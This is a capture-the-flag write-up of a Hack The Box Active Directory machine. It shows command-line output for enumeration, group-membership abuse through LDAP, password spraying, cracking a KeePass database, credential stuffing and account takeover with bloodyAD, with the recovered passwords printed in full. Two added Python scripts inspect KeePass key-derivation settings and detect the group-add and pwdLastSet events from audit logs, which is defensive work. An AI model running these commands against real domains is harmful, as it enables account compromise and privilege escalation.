[screenshot]

Information gathering

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# nmap -p- --min-rate 10000 -oN ports.txt 10.10.11.70
Nmap scan report for 10.10.11.70
Host is up (0.19s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
2049/tcp open nfs
3260/tcp open iscsi
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49674/tcp open unknown
49692/tcp open unknown
62521/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds
┌──(root㉿kali)-[~]
└─# nmap -sCV -p- --min-rate 10000 10.10.11.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-23 04:03 EDT
Host is up (0.18s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-23 14:40:50Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49692/tcp open msrpc Microsoft Windows RPC
62492/tcp open msrpc Microsoft Windows RPC
62521/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-07-23T14:41:51
|_ start_date: N/A
|_clock-skew: 6h36m23s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.86 seconds

The supplied username cannot log in over WinRM (5985).

Try SMB instead.

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# smbmap -H 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!'


SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
The NETBIOS connection with the remote host timed out.
The NETBIOS connection with the remote host timed out.

[+] IP: 10.10.11.70:445 Name: 10.10.11.70 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS DEV-SHARE for PUPPY-DEVS
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# crackmapexec smb 10.10.11.70 -u "levi.james" -p "KingofAkron2025\!" --users
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [+] Enumerated domain user(s)
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 2 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper badpwdcount: 5 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\jamie.williams badpwdcount: 5 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\adam.silver badpwdcount: 1 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\ant.edwards badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\levi.james badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 10.10.11.70 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.70 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain

Let's look at the shares.

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# smbclient //10.10.11.70/NETLOGON -U "levi.james"

Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 21 01:33:44 2025
.. D 0 Wed Feb 19 06:46:56 2025

5080575 blocks of size 4096. 1632326 blocks available

Nothing there.

Add the domain name to the hosts file:

10.10.11.70   dc.puppy.htb dc puppy.htb

SMB enumeration again, now that the hostname resolves:

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# smbmap -H 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!'



[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.10.11.70:445 Name: dc.puppy.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS DEV-SHARE for PUPPY-DEVS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections

BloodHound attack path analysis

Next, use BloodHound for some enumeration.

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# bloodhound-python -d puppy.htb -dc dc.puppy.htb -u levi.james -p 'KingofAkron2025!' -c All -ns 10.10.11.70 --dns-timeout 15 --dns-tcp -o bloodhound.json

INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
ERROR: Unhandled exception in computer DC.PUPPY.HTB processing: The NETBIOS connection with the remote host timed out.
INFO: Traceback (most recent call last):

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# sudo neo4j console

Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2025-07-23 12:31:04.563+0000 INFO Starting...
2025-07-23 12:31:05.319+0000 INFO This instance is ServerId{7f6c1dca} (7f6c1dca-059c-4e0b-b189-7ba241b8a56d)
2025-07-23 12:31:07.107+0000 INFO ======== Neo4j 4.4.26 ========
2025-07-23 12:31:09.136+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-07-23 12:31:09.136+0000 INFO Updating the initial password in component 'security-users'
2025-07-23 12:31:09.445+0000 INFO Bolt enabled on localhost:7687.
2025-07-23 12:31:10.918+0000 INFO Remote interface available at http://localhost:7474/
2025-07-23 12:31:10.925+0000 INFO id: 108D734EF023B8E7D0237E6A765BEE9A1E0C75B0D1C260D7A56C79C35E49FA81
2025-07-23 12:31:10.925+0000 INFO name: system
2025-07-23 12:31:10.925+0000 INFO creationDate: 2025-07-23T11:58:58.773Z
2025-07-23 12:31:10.925+0000 INFO Started.

┌──(root㉿kali)-[/myift/BloodHound-linux-x64]
└─# ./BloodHound --no-sandbox
(node:6869) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
(node:6933) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.


[screenshot]

Import the files.

LEVI.JAMES is a member of HR@PUPPY.HTB (the MemberOf edge means "belongs to this group").

HR@PUPPY.HTB has GenericWrite over DEVELOPERS@PUPPY.HTB.

[screenshot]

[screenshot]

This means that members of the HR group (that is, the current user LEVI.JAMES) can modify certain attributes of the DEVELOPERS group.

Common ways this is abused:

Adding new members to DEVELOPERS (even though the current user has no direct write permission, it can be done by abusing the group);

If DEVELOPERS contains high-privilege users (such as domain admins or service accounts), the group's rights can be used to escalate privileges indirectly.

We add ourselves to the DEVELOPERS group.

Before adding:

[screenshot]

Confirm the Distinguished Name (DN) of levi.james:

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# ldapsearch -x -H ldap://dc.puppy.htb -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -b "DC=puppy,DC=htb" "(sAMAccountName=levi.james)" dn

# extended LDIF
#
# LDAPv3
# base <DC=puppy,DC=htb> with scope subtree
# filter: (sAMAccountName=levi.james)
# requesting: dn
#

# Levi B. James, MANPOWER, PUPPY.HTB
dn: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB

# search reference
ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB

# search reference
ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Build the LDIF file

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# vim add_to_developers.ldif

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# cat add_to_developers.ldif
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

The member value is the DN returned by the ldapsearch above. It must stand alone on its line: anything appended after the DN (such as an inline comment) would become part of the attribute value and the modify would fail.

Run the modification:

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# ldapmodify -x -H ldap://dc.puppy.htb -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -f add_to_developers.ldif
modifying entry "CN=DEVELOPERS,DC=PUPPY,DC=HTB"


┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# ldapsearch -x -H ldap://dc.puppy.htb -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -b "CN=DEVELOPERS,DC=PUPPY,DC=HTB" member
# extended LDIF
#
# LDAPv3
# base <CN=DEVELOPERS,DC=PUPPY,DC=HTB> with scope subtree
# filter: (objectclass=*)
# requesting: member
#

# DEVELOPERS, PUPPY.HTB
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
member: CN=Jamie S. Williams,CN=Users,DC=PUPPY,DC=HTB
member: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
member: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Levi B. James was successfully added to the DEVELOPERS group.

The DEVELOPERS group now:

[screenshot]

Looking at the overall picture:

[screenshot]

There is an _adm account,

and there is also:

[screenshot]

These two accounts seem related.

[screenshot]

STEPH.COOPER@PUPPY.HTB has remote login rights and is related to the domain administrator account.

Mark it as a high-value target first.

Password spraying

Do a password spray.

Sync the time first (the BloodHound run above fell back to NTLM because of clock skew):

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# sudo apt install ntpdate -y
sudo ntpdate dc.puppy.htb

Collect the usernames from the BloodHound database:

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# cypher-shell -u neo4j -p '123456' "MATCH (u:User) RETURN split(u.name, '@')[0]" | tail -n +2 | sed 's/"//g' > users.txt

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# cat users.txt
JAMIE.WILLIAMS
ADAM.SILVER
ANT.EDWARDS
LEVI.JAMES
KRBTGT
ADMINISTRATOR
STEPH.COOPER
GUEST
STEPH.COOPER_ADM
NT AUTHORITY

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# kerbrute passwordspray --dc dc.puppy.htb -d puppy.htb users.txt 'KingofAkron2025!' -v


Version: dev (n/a) - 07/25/25 - Ronnie Flathers @ropnop

2025/07/25 09:03:28 > Using KDC(s):
2025/07/25 09:03:28 > dc.puppy.htb:88

2025/07/25 09:04:09 > [!] NT AUTHORITY@puppy.htb:KingofAkron2025! - User does not exist
2025/07/25 09:04:10 > [!] STEPH.COOPER_ADM@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:10 > [!] ADAM.SILVER@puppy.htb:KingofAkron2025! - USER LOCKED OUT
2025/07/25 09:04:10 > [!] GUEST@puppy.htb:KingofAkron2025! - USER LOCKED OUT
2025/07/25 09:04:10 > [!] JAMIE.WILLIAMS@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:10 > [!] STEPH.COOPER@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:10 > [!] KRBTGT@puppy.htb:KingofAkron2025! - USER LOCKED OUT
2025/07/25 09:04:10 > [!] ANT.EDWARDS@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:10 > [!] ADMINISTRATOR@puppy.htb:KingofAkron2025! - Invalid password
2025/07/25 09:04:15 > [+] VALID LOGIN: LEVI.JAMES@puppy.htb:KingofAkron2025!
2025/07/25 09:04:15 > Done! Tested 10 logins (1 successes) in 46.247 seconds

Some users show USER LOCKED OUT, including ADAM.SILVER@puppy.htb from our DEVELOPERS group.

[screenshot]

ant.edwards has full control over ADAM.SILVER.

After joining the new group, our SMB permissions change:

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# smbmap -H 10.10.11.70 -u "levi.james" -p 'KingofAkron2025!'



[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
The NETBIOS connection with the remote host timed out.

[+] IP: 10.10.11.70:445 Name: dc.puppy.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV READ ONLY DEV-SHARE for PUPPY-DEVS
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections

DEV is now readable.

Retrieving recovery.kdbx

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# smbclient //10.10.11.70/DEV -U "levi.james"

Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Mar 23 03:07:57 2025
.. D 0 Sat Mar 8 11:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 03:09:12 2025
Projects D 0 Sat Mar 8 11:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 22:25:46 2025

5080575 blocks of size 4096. 1643044 blocks available
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>

The file is encrypted, so we brute-force the password.

Use keepass4brute, a keepass2john-style variant, to brute-force the .kdbx file:

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# ./keepass4brute/keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344392 - Attempts per minute: 65 - Estimated time remaining: 21 weeks, 6 days
[+] Current attempt: liverpool

[*] Password found: liverpool
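Whether a brute force like this is feasible depends on the database's key-derivation settings, which sit unencrypted in the outer KDBX header. The script below is an added example, not code from the write-up or from keepass4brute: it parses the outer header of a KDBX 3.x or 4.x file and reports the cipher and KDF parameters (AES-KDF transform rounds, or Argon2 iterations, memory and parallelism). The headers it parses by default are constructed in build_sample_v3/build_sample_v4 with dummy seeds; the signature, field IDs and cipher/KDF UUIDs are the constants from the KeePass 2.x format.

```python
import struct
import uuid

SIG1, SIG2 = 0x9AA2D903, 0xB54BFB67          # KDBX (KeePass 2.x) file signature
CIPHERS = {
    "31c1f2e6-bf71-4350-be58-05216afc5aff": "AES-256-CBC",
    "d6038a2b-8b6f-4cb5-a524-339a31dbb59a": "ChaCha20",
}
KDFS = {
    "c9d9f39a-628a-4460-bf74-0d08c18a4fea": "AES-KDF",
    "ef636ddf-8c29-444b-91f7-a9a403e30a0c": "Argon2d",
    "9e298b19-56db-4773-b23d-fc3ec6f0a1e6": "Argon2id",
}
# Outer-header field IDs this parser cares about
END_OF_HEADER, CIPHER_ID, MASTER_SEED, TRANSFORM_SEED = 0, 2, 4, 5
TRANSFORM_ROUNDS, ENCRYPTION_IV, KDF_PARAMETERS = 6, 7, 11
_SCALAR = {0x04: "<I", 0x05: "<Q", 0x0C: "<i", 0x0D: "<q"}   # VariantDictionary scalar types


def parse_variant_dict(buf):
    """KDBX 4 VariantDictionary: u16 version, then (u8 type, i32 name_len, name, i32 val_len, value)
    entries, terminated by a 0 type byte."""
    pos, out = 2, {}
    while True:
        vtype = buf[pos]
        pos += 1
        if vtype == 0:
            return out
        (nlen,) = struct.unpack_from("<i", buf, pos)
        name = buf[pos + 4:pos + 4 + nlen].decode()
        pos += 4 + nlen
        (vlen,) = struct.unpack_from("<i", buf, pos)
        raw = buf[pos + 4:pos + 4 + vlen]
        pos += 4 + vlen
        if vtype in _SCALAR:
            out[name] = struct.unpack(_SCALAR[vtype], raw)[0]
        elif vtype == 0x08:
            out[name] = raw != b"\x00"
        elif vtype == 0x18:
            out[name] = raw.decode()
        else:
            out[name] = bytes(raw)          # 0x42: byte array (UUIDs, salts)


def parse_kdbx_header(data):
    """Parse the unencrypted outer header of a KDBX 3.x/4.x file; report cipher and KDF settings."""
    sig1, sig2, version = struct.unpack_from("<III", data, 0)
    if (sig1, sig2) != (SIG1, SIG2):
        raise ValueError("not a KDBX 2.x database")
    major, minor = version >> 16, version & 0xFFFF
    size_fmt = "<I" if major >= 4 else "<H"      # field length is u32 in KDBX 4, u16 before
    pos, fields = 12, {}
    while True:
        fid = data[pos]
        (flen,) = struct.unpack_from(size_fmt, data, pos + 1)
        pos += 1 + struct.calcsize(size_fmt)
        fields[fid] = data[pos:pos + flen]
        pos += flen
        if fid == END_OF_HEADER:
            break
    info = {"version": f"{major}.{minor}", "header_size": pos,
            "cipher": CIPHERS.get(str(uuid.UUID(bytes=bytes(fields[CIPHER_ID]))), "unknown")}
    if major >= 4:
        kdf = parse_variant_dict(fields[KDF_PARAMETERS])
        info["kdf"] = KDFS.get(str(uuid.UUID(bytes=kdf["$UUID"])), "unknown")
        info["params"] = {k: v for k, v in kdf.items() if k in ("R", "I", "M", "P")}
    else:
        info["kdf"] = "AES-KDF"
        info["params"] = {"R": struct.unpack("<Q", fields[TRANSFORM_ROUNDS])[0]}
    return info


def _field(major, fid, payload):
    return bytes([fid]) + struct.pack("<I" if major >= 4 else "<H", len(payload)) + payload


def _variant_dict(entries):
    out = struct.pack("<H", 0x0100)
    for name, vtype, raw in entries:
        out += bytes([vtype]) + struct.pack("<i", len(name)) + name.encode() + struct.pack("<i", len(raw)) + raw
    return out + b"\x00"


def build_sample_v3(rounds=60000):
    """Constructed KDBX 3.1 header (AES-256 + AES-KDF) with dummy seeds and IV."""
    body = _field(3, CIPHER_ID, uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff").bytes)
    body += _field(3, MASTER_SEED, b"\x01" * 32) + _field(3, TRANSFORM_SEED, b"\x02" * 32)
    body += _field(3, TRANSFORM_ROUNDS, struct.pack("<Q", rounds)) + _field(3, ENCRYPTION_IV, b"\x03" * 16)
    body += _field(3, END_OF_HEADER, b"\r\n\r\n")
    return struct.pack("<III", SIG1, SIG2, 0x00030001) + body


def build_sample_v4(iterations=10, memory_kib=65536, parallelism=2):
    """Constructed KDBX 4.0 header (ChaCha20 + Argon2d) with dummy seeds, salt and IV."""
    kdf = _variant_dict([
        ("$UUID", 0x42, uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c").bytes),
        ("S", 0x42, b"\x04" * 32),
        ("P", 0x04, struct.pack("<I", parallelism)),
        ("M", 0x05, struct.pack("<Q", memory_kib * 1024)),   # Argon2 memory is stored in bytes
        ("I", 0x05, struct.pack("<Q", iterations)),
        ("V", 0x04, struct.pack("<I", 0x13)),
    ])
    body = _field(4, CIPHER_ID, uuid.UUID("d6038a2b-8b6f-4cb5-a524-339a31dbb59a").bytes)
    body += _field(4, MASTER_SEED, b"\x01" * 32) + _field(4, ENCRYPTION_IV, b"\x03" * 12)
    body += _field(4, KDF_PARAMETERS, kdf) + _field(4, END_OF_HEADER, b"\r\n\r\n")
    return struct.pack("<III", SIG1, SIG2, 0x00040000) + body


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read(4096) if len(sys.argv) > 1 else build_sample_v3()
    print(parse_kdbx_header(data))
```

Run it with a .kdbx path to inspect a real file. The rate keepass4brute reported above (about 65 attempts per minute) is set by exactly these parameters: the database owner's lever against this kind of guessing is a high AES-KDF round count or, better, Argon2 with generous memory and iterations, on top of a passphrase that is not in a wordlist.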

Open the database directly and look at its contents:

keepassxc

[screenshot]

Passwords obtained:

HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!

Plus the accounts collected earlier that can log in:

ANT.EDWARDS
STEPH.COOPER
STEPH.COOPER_ADM
ADMINISTRATOR
JAMIE.WILLIAMS

Password brute force

┌──(root㉿kali)-[/myift/…/htb/8/1/1]
└─# crackmapexec smb 10.10.11.70 -u use.txt -p passwd.txt
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ANT.EDWARDS:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ANT.EDWARDS:Antman2025!

Got ANT.EDWARDS:Antman2025!

[screenshot]

As noted above, ANT.EDWARDS has full control over adam.

So we go straight to it.

Taking over the ADAM user

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 remove uac -f LOCKOUT -f ACCOUNTDISABLE adam.silver
[-] ['LOCKOUT', 'ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
// adam.silver is now enabled
┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set owner adam.silver ant.edwards
[+] Old owner S-1-5-21-1487982659-1829050783-2281216199-512 is now replaced by ant.edwards on adam.silver
// Sets the Owner attribute of the adam.silver object to ant.edwards.

Then change adam.silver's password:

┌──(root㉿kali)-[/myift/…/8/1/1/2]
└─# bloodyAD -d puppy.htb -u ant.edwards -p Antman2025! --dc-ip 10.10.11.70 set password adam.silver Adam@2025!
Traceback (most recent call last):
File "/root/.local/bin/bloodyAD", line 8, in <module>
sys.exit(main())
~~~~^^
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/main.py", line 210, in main
output = args.func(conn, **params)
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/set.py", line 273, in password
raise e
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/set.py", line 118, in password
conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/network/ldap.py", line 315, in bloodymodify
raise err
msldap.commons.exceptions.LDAPModifyException:
Password can't be changed before -1 day, 6:27:48.198356 because of the minimum password age policy.

This error message points clearly at the problem:

  1. msldap.commons.exceptions.LDAPModifyException: an exception occurred while performing an LDAP (Lightweight Directory Access Protocol) modify operation. bloodyAD talks to Active Directory over LDAP.

  2. Password can't be changed before -1 day, 6:27:48.198356 because of the minimum password age policy.: this is the key part. It says:

    • "Password can't be changed": the password reset was refused.
    • "because of the minimum password age policy": the reason is an Active Directory security policy called **"Minimum Password Age"**.
    • "before -1 day, 6:27:48.198356": the adam.silver account's password has not yet been in use for the minimum time the domain policy requires since it was last changed. Active Directory forces users to wait a set period (for example 1 day or 3 days) before changing the password again, to stop them from immediately reverting to an old password or cycling passwords to defeat other policies.

    The -1 day, 6:27:48.198356 here may mean that the password can be changed again in a little over 1 day and 6 hours, or that the last change was more than a day ago but the minimum password age set by the domain controller has still not elapsed. Typically, right after an account's password is reset or changed, it enters a "cooling-off" period during which it cannot be changed again.


Bypassing the minimum password age restriction

The restriction is bypassed by modifying the pwdLastSet timestamp.

How the bypass works:
When the pwdLastSet attribute is set to 0, Active Directory treats the account's password as never having been set, or as being in a state where it must be changed immediately. In that case the domain controller skips the "minimum password age" check and allows a new password to be set right away.
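Both the group-membership change earlier (levi.james adding himself to DEVELOPERS) and the pwdLastSet reset described here leave a trail on a domain controller that audits directory changes: member additions log Security event 4728/4732/4756, attribute writes log 5136 (which requires "Audit Directory Service Changes" and a SACL on the objects), and password resets log 4724. The Python below is an added example, not part of the original write-up, covering both passages: it runs those rules over a constructed, simplified export of such events and escalates a pwdLastSet=0 write that is followed by a password reset on the same account. Field names are flattened relative to the real event schema, the DN-to-account lookup is a stand-in for an LDAP resolution, and all timestamps are invented.

```python
from datetime import datetime, timedelta

# Constructed, flattened Security events (not real logs from this box). Names and DNs reuse the
# ones seen in this write-up; timestamps are invented.
#   4728/4732/4756 = member added to a global/local/universal security group
#   5136           = directory service object modified
#   4724           = an attempt was made to reset an account's password
EVENTS = [
    {"time": "2025-07-24 19:55:10", "id": 4728, "subject": "levi.james",
     "member": "CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB", "target": "DEVELOPERS"},
    {"time": "2025-07-24 20:10:00", "id": 4728, "subject": "Administrator",        # benign: admin-driven change
     "member": "CN=Jamie S. Williams,CN=Users,DC=PUPPY,DC=HTB", "target": "DEVELOPERS"},
    {"time": "2025-07-25 16:40:00", "id": 5136, "subject": "Administrator",        # benign attribute edit
     "object": "CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB", "attribute": "description",
     "value": "Developer", "operation": "%%14674"},
    {"time": "2025-07-25 17:05:30", "id": 5136, "subject": "ant.edwards",          # pwdLastSet written to 0
     "object": "CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB", "attribute": "pwdLastSet",
     "value": "0", "operation": "%%14674"},
    {"time": "2025-07-25 17:06:02", "id": 4724, "subject": "ant.edwards", "target": "adam.silver"},
]
GROUP_ADD_EVENTS = {4728, 4732, 4756}
ADMIN_ACCOUNTS = {"administrator"}          # principals expected to change group membership
VALUE_ADDED = "%%14674"                     # 5136 OperationType for "Value Added"
# Constructed stand-in for resolving a DN to a sAMAccountName (a real pipeline would query LDAP)
DN_TO_SAM = {"CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB": "adam.silver"}


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def audit(events, admins=ADMIN_ACCOUNTS, window=timedelta(minutes=30)):
    """Alerts for (a) group membership added by a non-admin principal and (b) pwdLastSet set to 0,
    escalated to high when a password reset on the same account follows within the window."""
    alerts = []
    for e in events:
        if e["id"] in GROUP_ADD_EVENTS and e["subject"].lower() not in admins:
            alerts.append({"rule": "group-membership-change", "severity": "medium", "time": e["time"],
                           "subject": e["subject"], "target": e["target"],
                           "detail": f"{e['member']} added by a non-admin principal"})
        elif (e["id"] == 5136 and e["attribute"].lower() == "pwdlastset"
              and e["value"] == "0" and e["operation"] == VALUE_ADDED):
            account = DN_TO_SAM.get(e["object"], e["object"])
            resets = [f for f in events if f["id"] == 4724 and f["target"].lower() == account.lower()
                      and timedelta(0) <= _ts(f) - _ts(e) <= window]
            detail = "pwdLastSet=0 marks the password as never set, which sidesteps the minimum password age"
            if resets:
                detail += f"; password reset by {resets[0]['subject']} at {resets[0]['time']}"
            alerts.append({"rule": "pwdlastset-reset", "severity": "high" if resets else "medium",
                           "time": e["time"], "subject": e["subject"], "target": account, "detail": detail})
    return alerts


if __name__ == "__main__":
    for a in audit(EVENTS):
        print(f"[{a['severity']}] {a['time']} {a['rule']}: {a['subject']} -> {a['target']} ({a['detail']})")
```

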